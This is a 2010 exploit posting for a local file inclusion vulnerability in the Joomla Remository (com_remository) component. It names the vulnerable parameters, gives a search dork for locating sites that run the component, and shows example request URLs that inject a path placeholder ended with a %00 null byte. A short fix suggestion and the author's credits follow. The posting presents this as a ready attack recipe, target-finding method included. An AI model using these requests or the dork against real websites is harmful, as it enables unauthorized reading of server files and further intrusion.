Home / os / win7

joomlaremository-lfi.txt

Posted on 02 July 2010

# Exploit Title: Joomla Component Remository (com_remository) LFI # Date: 01/06/10 # Author: _Mlk_ # Software Link: http://bugsec.googlecode.com/files/Joomla_com_remository.zip # Version: all # Tested on: unix*,win32* # CVE : null Joomla Component Remository (com_remository) - Local File Inclusion Vulnerability ############################################################################################################## [+] Discovered by : _mlk_ (Renan) [+] Teams : c00kies , BugSec , BotecoUnix & c0d3rs [+] Homepages : http://code.google.com/p/bugsec/ <> http://botecounix.com.br/blog/ <> http://c0d3rs.wordpress.com/ [+] Location : Porto Alegre - RS, Brasil (or Brazil) [+] original file: http://bugsec.googlecode.com/files/Joomla_com_remository.zip ############################################################################################################## [-] Information [?] Script : Remository [?] Vendor : http://remository.com/ [?] Dork/String : "index.php?option=com_remository" / "com_remository" [?] Download : http://remository.com/downloads/ [?] Date : 01, July 2010 ############################################################################################################## [*] Parameters vuls : view Itemid controller task ############################################################################################################## [*] Example : http://localhost/index.php?option=com_remository&task=[LFI]%00 http://localhost/[PATH]/index.php?option=com_remository&view=[LFI]%00 ############################################################################################################## [*] Solution : Make a function that scans and reads the inclusion of paths and chars(%00) . ############################################################################################################## [~] Agradecimentos : Deus , Familiares , Amigos e Tricolor Gaúcho (Grémio) . Em especial "Cooler_" . ##############################################################################################################

 

TOP